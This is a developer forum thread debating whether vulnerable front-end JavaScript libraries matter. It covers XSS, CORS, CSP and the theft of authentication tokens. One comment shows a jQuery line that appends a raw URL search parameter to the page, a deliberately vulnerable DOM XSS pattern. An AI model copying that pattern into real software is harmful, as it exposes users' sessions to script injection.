[merb]

> One of the discoveries the report mentions is that an analysis of around 433,000 sites found that 77% of them use at least one front-end JavaScript library with a known security vulnerability.

Does that even matter? No Front-End JS Library should actually make your backend vulnerable.

[bastawhiz]

An XSS issue could make your users' data vulnerable.

[oneweekwonder]

But cors[0] headers can mitigate some of the risk?

[0]: https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS

[amenghra]

You want CSP headers to mitigate XSS risks.

[thefreeman]

Not really. CORS headers are set by the destination of the XHR. In the case of XSS it would be an attacker controlled server used to exfiltrate user cookies, etc.

[zaarn]

Your backend should be double-checking any escaping the frontend does.

Otherwise you can throw your fancy anti-XSS on the frontend in the bin.

Also CSP helps.

[merb]

is still only an issue if you pass untrusted data to your js code.

[Klathmon]

And there is a pretty good chance of that happening in most JS projects.

Anywhere you take or show input from the user (an input box, a URL query, displaying data stored by some other system on the DB, etc...) could be a vector for an XSS attack.

And it's not just data passed to JS, but data passed to HTML or any data that could make it's way into CSS in many cases!

[sakshyamshah]

turns out that most of times, untrusted user supplied data slips through JS codes https://www.owasp.org/index.php/Top_10_2017-Top_10

[will4274]

> No Front-End JS Library should actually make your backend vulnerable.

FUD. Most SPAs keep the authentication token accessible to JavaScript so it can be sent to the API server. And XSS in the FE JS can permit an attacker to steal the user's authentication token and then the attacker could impersonate the user and take any action as the user.

[wrinkl3]

Vulnerabilities don't have to affect the backend - most of JQuery-related CVEs that I could find had to do with XSS.

[merb]

which can only happen if you pass wrong data from the backend to the jquery related function. I.e. dynamically generate input for $()...

[PetahNZ]

Well not really backend exclusive: `$('#foo').append('Showing search results for ' + (new URL(location)).searchParams.search);`

[sakshyamshah]

Only if your front end is SPA and backend just serves through data via api. even in that case, xss in front-end can compromise admin's web sessions to pivot into backend services.